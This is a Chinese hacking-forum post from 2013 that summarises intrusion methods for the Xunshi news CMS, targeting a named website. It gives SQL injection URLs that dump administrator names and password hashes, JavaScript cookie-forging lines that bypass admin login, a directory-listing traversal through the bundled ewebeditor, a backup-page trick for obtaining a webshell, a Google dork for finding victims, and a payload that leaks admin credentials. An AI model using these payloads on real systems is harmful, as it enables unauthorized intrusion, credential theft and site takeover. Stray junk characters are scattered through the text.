找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2560|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘' `$ I8 H0 Z. ^' g) {( R5 w6 \
% M$ R* m1 A0 V
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
, C' J( e3 N# x6 F& P3 w# g; i" L% O, z8 `3 J
以下本文总结来自黑防去年第9期杂志上的内容...
1 F9 t7 W) \  l8 p- k" o2 f& U" C" L1 \' U
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
7 M2 X4 {2 f/ t1 v, F4 _+ y2 d2 }0 k$ R! s
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 - g: B5 q2 P# j7 S

  e4 p" Z  o, G  P4 k记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
7 y2 M* J/ J5 E7 o) y这里一个注入
  v" Q0 z2 j9 R0 |+ J6 y) ~' w$ \# M# y4 H
效果如图:
& f: X2 H' ~, d! K9 v( M! i- ]( S1 X! d( A* p% B. ?# u

& i) E* W+ ]% b$ @  N) Z- l$ p3 N, ], S4 S
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
6 E' V+ V. n, [& c1 z' r
  M# N, Z( n3 w$ x9 v1 P密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去: q8 h! ?3 S8 H( E

. ], r; m; a5 Q. Z+ Vjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));# q- K8 i9 K/ Q# ?3 Y
0 X/ r) A8 A7 o: w; R
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
: z0 G: L" U+ Z' h
" k6 q5 c+ F& v+ p( c因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞- Y  L% q4 H: y( O
" p* x$ `- o" E9 |; O2 ?
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以& K7 ^5 V- [: P( Z: q) M! [" A

' x' K" H$ f1 F3 O$ H5 S2 m: f! X访问这页面来列目录..步骤如下:
+ q9 ~& s- z6 |4 K* |# R1 s
# A& F$ j' j5 e1 K) rjavascript:alert(document.cookie="admindj=1") 8 U) J4 ?9 V0 \8 k8 v8 R

2 x$ ]0 }5 |; u% T; {6 }http://www.political-security.co ... asp?id=46&dir=../..
& ?( z9 h" v8 ?
. `, f/ J2 q* M0 v8 T6 `效果如图:: s- D' V1 k6 B8 P2 `
+ b& }; \$ _. w1 \, Z6 g" @
1 B4 P4 ]# z% ~

4 i' {( [: Y" E% t+ A4 H这样全站目录都能瞧了..找到后台目录..进去..9 Y  N0 b" t7 d  A
5 D7 w4 u/ c5 d  E2 L
那么进了后台怎么拿shell??上传--备份就ok了.." T! Y( }2 C- A9 Z; y" l8 [
, S2 q  B/ T- G7 P% A% @( ?! Q
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..3 p* X+ f5 B! j8 P+ `3 A
% ]3 p9 ^0 p) N
这个我也碰到过一次..你都可以通过列目录来实现..& o3 B+ }: t  X8 y
" k9 T1 b& K. v5 }/ D/ L
javascript:alert(document.cookie="admindj=1") " ^2 m1 n' E6 r7 O# q

; R9 y( N5 U, bhttp://www.political-security.co ... p?action=BackupData
7 a; L# X7 j; g  T& X" K
9 _: N) S% b$ n3 ~9 \备份ok..+ u' |& l. e3 v. N$ e1 |3 G( Z

( S6 V4 e7 W1 z7 ]8 S0 p那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
2 o% `# P' P$ L. w8 P3 x( p& y% J8 ^
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
% E* `' J- _  R, v+ Y& |
8 v7 x  _- j' P! Z/ Q然后访问此页面进行注入..步骤如下:
* e3 v( H. D) h7 F: H& j, |& y9 `4 J' ~& n2 x: B/ I, R
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
6 n: Z2 R+ w" r. A6 @& A8 p
+ A; T! ^1 E$ q- m; p# U然后请求admin/admin_chk.asp页面
# k6 G+ R7 l. N" z: H
# ?' T0 T2 q1 g5 e5 w/ y" C输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
9 e8 ^% O- i: p2 w% n$ }- D
: _4 A, e9 d, l# `( r26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
% T' I' U( j" I7 J( {7 W* p# T! V( I- _! K8 W' h2 |' j+ j
效果如图所示:/ k) r" Y+ ]- N% f7 m
" D- B1 c* h. E. J1 e
# i% F# h- m  [* l5 V  y
; j" o8 _6 }( C  D& [3 V& J
讯时漏洞2
! G/ x4 o8 s& _2 g+ ?google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)5 n0 t$ h6 _$ Z7 ?! f' J) _

3 X. s  E8 l2 h6 K1、/admin/admin_news_pl_view.asp?id=1' N3 B) c. `4 h) g) {$ x* i' B3 D: `
//id任意 填入以下语句: Q' C1 c, \: i" b

% v, b/ w* _: E- n! K* ]8 x4 C2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!  [% h8 v$ `( E* ?" P+ F: M- M

5 Z/ t5 d1 v+ ^0 V& {# L
; h2 a* j3 {5 q- z( E7 q2 d
) t  `: f5 }4 K4 b3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
* z7 s% z) i  X& H, t9 v$ I0 c4 O ! u4 I' z  K6 `

) S/ o8 n8 Q& U  w7 ]( g+ L
& \$ L7 F3 ^, ]5 a4 T7 @/ R$ ]$ @5 c爆出管理员帐号和密码了# w2 R1 u3 j, g( v
2 `6 o. I1 D9 W" y- p

$ `3 i. V, c1 a1 T; m0 c( p- C( x5 z  [- }
4、cookies进后台! x$ [& s$ H2 p  l8 i
. P& I$ x$ T0 P+ r) P$ \2 N! d! ?" B
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));) ~) h0 Z- J* ?" l( K
/ W! S! z% ?  Z1 d' s. ~+ M) j

7 q6 g1 M5 ^0 U  _: W
7 x" J+ m( w+ h2 y/ p, B* }5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
$ f1 |& b- q1 {1 I6 j
" V5 ?- v! A6 |# s. w4 {, Z1 U
5 b0 \4 O5 ]8 h. V! @# b# b' r8 t+ K: X( e5 Y. ^6 k4 a' A0 _
6、后台有上传和备份取SHELL不难。/ K. C" N: X6 `. \

% U; U' k4 z2 H: T7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
" G1 W; I, L, p; A; [; X
1 n  f: C6 k; [0 j逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!1 m5 Y, b9 s* E
' B4 J( i6 x5 E

+ w9 W3 P4 [( u4 X$ F2 q# }" ~2 C  y$ \1 h3 Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表